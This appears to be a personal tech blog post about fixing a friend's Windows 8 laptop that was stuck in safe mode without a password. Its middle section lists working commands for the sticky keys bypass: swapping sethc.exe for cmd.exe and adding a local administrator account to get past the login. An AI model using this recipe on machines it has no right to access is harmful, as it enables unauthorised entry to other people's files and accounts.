Repairs on the side, Windows 8, Forgotten Passwords and the Sticky Key Exploit
The Issue
User shoots me an email, personal laptop playing up after the latest Windows update mishap. Just a few hours ago, I’ve explained to someone over the phone how to boot to the recovery command prompt, uninstall the latest updates and give the disk a bit of a telling to.
Sure, no problem. Leave it with me, charger and password. I’ll give you a shout when done.
It’s Friday. I’m thinking beer money.
Boot the laptop, enter the given pin. This should have been the first alarm bell. Pin. Continue to boot to desktop. All ok. Bah! It’s fine. “Fixed itself” – no beer money. Wait, wait… screen starts to flash randomly. Once. Twice. Faulty laptop, something to repair.
Quickie email to user, you said a, it’s doing b, come take a look. Ah! New problem. Assume update issue (I haven’t a clue right now, I’m thinking Intel driver…). Ok, I have to shoot, pick it up Tuesday? Sure see you then.
Friday beer money gone, mid-week lunch with Mrs (works down the road) on the horizon.
It’s 5:30. I’m finishing up work / burning an 8 install disk. Reboot the laptop – still flashing. Can’t do anything unless it’s between the 2/3 second flashes.
Default first fix rule, profile or OS? – Safe mode.
The Problem
Hmm Windows 8 safe mode, this is new. Can’t use advanced Windows features, screen pretty much locked. Shift and F8 not playing ball. Manage to get MSCONFIG up after a couple of well-timed clicks. Set the flag.
Reboot to safe mode. Asks for password. I have pin. Text user. No clue. No password. I’m stuck in safe mode.
I’ve now got a laptop that’s stuck in safe mode. No Administrative account or password. Great.
Hiren’s it is. K0nb00t. No joy. Password changer no joy. Can’t manually load registry. Of course not, this is Mr Protected Windows 8. So I grab a copy of the “new” K0nb00t of a friend. No Joy.
Now worried. I can’t hack it the normal way.
So I’m thinking: Need to disable safeboot flag via command line. Recovery console.
I head over to 8 forums. Find the “ Windows 8 Safe Mode ” post. Exactly what I needed, as usual. Start mashing commands.
Windows says: Your commands are no good here. Googlemashing does not make you an IT engineer. Give up. Go home. I refuse to accept defeat. I know what I’m doing. Continue commands. bcdedit /enum, shoots errors. Of course it does, I’m running from CD not the inbuilt recovery partition. No switching allowed. Mash the commands anyway. Nope. Nothing.
Ok, so plan B. Create a user, elevate it, use that to login, reset user password, clear flag. Fix laptop. Earn lunch. Easy.
No.
This command prompt is not elevated and does not allow such things. This is also a Microsoft Online account, no local manipulation allowed. Humph. Google mashing commences. I stumble on this. “ Forgotten password K0nb00t ”. Last post … “Without requiring any 3rd party program”. Interesting.
The Fix
This is where it gets fun.
I know I need to get myself a local admin account sorted. So I can properly administer this machine. I know I can console this in, with the right console. Along comes the sticky key exploit. I’ll list my steps to gain Administrative access to Windows 8, without once entering a password.
Boot to your recovery CD
Open up a command prompt
copy c:\windows\system32\sethc.exe c:\ (assuming C is the OS)
copy /y c:\windows\system32\cmd.exe c:\windows\system32/sethc.exe
shutdown.exe –r (or back out of the menu to a reboot)
As soon as the login screen appears, mash the shift key, five times
A console should open
net user LWBM P455w0rd123 /add
net localgroup administrators LWBM /add (it did shoot an error, not one that concerned me)
shutdown.exe –r –t 5
The laptop rebooted, showed me the same user login screen, to which I don’t have access but the wondrous arrow, switch user. There I am. LWBM. Logging in. No problems.
Here I am logged in, as an Administrator, able to browse the other user’s files, desktop, OneDrive. Awesome.
I can now clear the safe mode flag, using safe mode’s GUI.
By this point I’ve completely forgotten I’m stuck in safe mode and just focused on gaining access. Hence no commands on my new found shift console.
The Actual Fix
Now I’ve gained access I can look at the flashing screen. I continue to do my look around trying to work out why. Safe mode is fine. User accounts, not so. OS issue. Hardware also fine (forgot to mention the base, case & keys are have the remnants of baby cream all over the place). A driver update did nothing (I was thinking a Windows update to the Intel driver may have gone awry). So I did a system restore, rolled back to before the last updates. Sorted. No more flashing. Checked for more / re ran the new patched updates. All good. Quick wipe down. Awaiting collection.
Lessons Learnt
Stop Grabbing at Quick Money
-
This goes with “have you got a second” and “just a quick look”
-
It’s never, ever a second, nor a quick look. Ever.
As much as I love Windows 8, it’s a challenge, it’s new.
Laptops now have both Online and Local accounts. You need a Local Admin account. Always. The Windows 8 setup does not push a user into setting one up, expect one not to have been created.
The sticky keys exploit – been around for ever – new to me!
As ever. Backup. Backup. Backup.
- I was doing things to a Windows 8 laptop I didn’t fully understand. I got the gist (as is the norm with me) but wasn’t 110% sure what I was doing, even though I started off fine. As soon as you can, backup. Things can go wrong so quickly, even when you’re following standard procedure. (I didn’t have to call on said backup, but the reassurance sitting next to me on a USB was comforting and de-stressing).
I’ll continue to fix users personal laptops. I get berated by friends and colleagues for it. It’s dangerous. It’s risky. You could totally mess it up, accidentally break it, find something worse that you can’t fix but is somehow now your fault, get it stolen in transit, change it in a way the owner doesn’t like, even if the tool bar was installed under SuperHappyFunTimeSearchAssistantHelperPro.
Lay down the rules to your customer. Paying or not. Define exactly what the issues are and what steps you’re going to take. Backup. If you can’t pinpoint the job at the start and intend on Googlemashing from the outset, don’t take the job on.
I learn so much more with users’ computers. They break differently than the ones I build at work.
